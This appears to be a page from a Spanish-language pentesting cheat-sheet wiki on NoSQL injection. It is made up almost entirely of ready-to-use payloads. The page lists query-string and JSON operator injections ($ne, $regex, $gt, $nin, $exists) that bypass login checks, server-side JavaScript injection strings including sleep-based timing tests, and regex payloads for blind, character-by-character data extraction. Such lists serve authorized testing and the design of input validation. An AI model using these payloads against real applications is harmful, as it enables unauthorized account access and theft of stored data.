NoSQL injection (NoSQLi)

Authentication bypass

Query string

username[$ne]=noexiste&password[$ne]=noexiste
username[$regex]=.*&password[$regex]=.*
username[$gt]=&password[$gt]=
username[$gte]=&password[$gte]=
username[$nin][]=noexiste&password[$nin][]=noexiste
username[$exists]=true&password[$exists]=true

  • $ne = not equals.

  • $regex = match a specified RegEx.

  • $gt = greater than.

  • $gte = greater than or equal to.

  • $nin = not in the specified array.

JSON

{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "noexiste"}, "password": {"$ne": "noexiste"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }

  • $ne = not equals.

  • $gt = greater than.

Server-Side JavaScript Injection (SSJI)

" || true || ""=="
' || true || ''=='
" && (sleep(5000)) || ""=="
' && (sleep(5000)) || ''=='

Data exfiltration

param[$ne]=noexiste
param[$regex]=.*
param[$gt]=''
param[$gte]=''
param[$lt]='~'
param[$lte]='~'

Blind

# query string
param[$regex]=^XYZ.*$
# JSON
{"param":{"$regex":"^XYZ.*$"}}

Server-Side JavaScript Injection (SSJI)

" || (this.param.match('^XYZ.*')) || ""=="
" || (this.param.match('^XYZ.*')) && (sleep(5000)) || ""=="

Wordlists

AnteriorsqlmapSiguienteXML external entity (XXE) injection

Última actualización